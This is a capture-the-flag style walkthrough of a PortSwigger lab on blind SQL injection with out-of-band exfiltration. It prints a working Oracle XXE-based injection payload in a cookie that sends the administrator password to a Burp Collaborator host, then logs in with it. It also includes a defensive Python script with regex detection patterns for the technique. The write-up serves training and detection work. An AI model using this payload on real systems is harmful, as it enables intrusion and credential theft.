
PortSwigger Blind SQL injection with out-of-band 1

Blind SQL injection with out-of-band data exfiltration

Solution

Open the lab website and go to a random product page, e.g. "Giant Pillow Thing":
https://0ab8005203e5da4580c90894005f00b9.web-security-academy.net/product?productId=3

Generate a Burp Collaborator subdomain

On the Collaborator tab, click "Copy to clipboard" to get a payload subdomain.

Subdomain:
l2o8ksdnqivqu9me5peo26ffy64xsoic7.oastify.com

Create the payload (URL-encoded, as it is sent in the TrackingId cookie)

'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.l2o8ksdnqivqu9me5peo26ffy64xsoic7.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--
--
Cookie: TrackingId=vB4vjb68ZMNoF1EE'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.l2o8ksdnqivqu9me5peo26ffy64xsoic7.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--; session=f812ZxiZdRT5eVwovx6UhwrEqPqAdtOm

Interaction received by Collaborator (the password is the leading label of the Host header)

Password: f7vg3n7bl1ekdsblpvdp
--
GET / HTTP/1.0
Host: f7vg3n7bl1ekdsblpvdp.l2o8ksdnqivqu9me5peo26ffy64xsoic7.oastify.com
Content-Type: text/plain; charset=utf-8
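An added example (not part of the lab or PortSwigger's material) showing how a defender can spot this technique in request logs: it URL-decodes the TrackingId cookie and matches the indicators the payload above relies on (UNION SELECT, EXTRACTVALUE/xmltype, a parameter entity declared with SYSTEM, and a Collaborator-style callback domain), and it recovers the leaked label from a callback Host header. The sample Cookie headers are constructed from the request on this page; the function names are my own.

```python
import re
from urllib.parse import unquote_plus

# Indicators of the technique used in this lab: a UNION-based injection that
# feeds an XML external entity into Oracle's EXTRACTVALUE/xmltype so the
# database itself resolves an attacker-controlled hostname.
INDICATORS = {
    "union_select": re.compile(r"\bUNION\s+SELECT\b", re.I),
    "oracle_xml_parser": re.compile(r"\b(EXTRACTVALUE|XMLTYPE)\s*\(", re.I),
    "external_entity": re.compile(r"<!ENTITY\s+%\s*\w+\s+SYSTEM\b", re.I),
    "oob_callback_domain": re.compile(r"\.(oastify\.com|burpcollaborator\.net)\b", re.I),
}

def cookie_value(header_value, name="TrackingId"):
    """Return the URL-decoded value of one cookie from a Cookie header, or None.
    Split on ';' before decoding so an encoded '%3b' inside a value cannot
    be mistaken for a field separator."""
    for part in header_value.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return unquote_plus(value)
    return None

def scan_cookie_header(header_value):
    """Return the names of the indicators matched by the decoded TrackingId cookie."""
    decoded = cookie_value(header_value)
    if decoded is None:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]

def leaked_label(host, collaborator_domain):
    """Return the data prepended as a subdomain in a callback Host header (i.e. what left the database)."""
    suffix = "." + collaborator_domain
    return host[:-len(suffix)] if host.endswith(suffix) else None

# Constructed sample: the Cookie header from this write-up and a benign one.
SAMPLE_HEADERS = [
    "TrackingId=vB4vjb68ZMNoF1EE'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d\"1.0\"+encoding%3d\"UTF-8\"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+\"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.l2o8ksdnqivqu9me5peo26ffy64xsoic7.oastify.com/\">+%25remote%3b]>'),'/l')+FROM+dual--; session=f812ZxiZdRT5eVwovx6UhwrEqPqAdtOm",
    "TrackingId=vB4vjb68ZMNoF1EE; session=f812ZxiZdRT5eVwovx6UhwrEqPqAdtOm",
]

if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        print(scan_cookie_header(header) or "clean")
    print(leaked_label("f7vg3n7bl1ekdsblpvdp.l2o8ksdnqivqu9me5peo26ffy64xsoic7.oastify.com",
                       "l2o8ksdnqivqu9me5peo26ffy64xsoic7.oastify.com"))
```

Any of the four indicators alone is a strong signal in a tracking cookie; the callback-domain match on its own is also what a DNS egress log from the database host would show.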

Log in as the administrator user

User: administrator
Password: f7vg3n7bl1ekdsblpvdp

Solved

Congratulations, you solved the lab!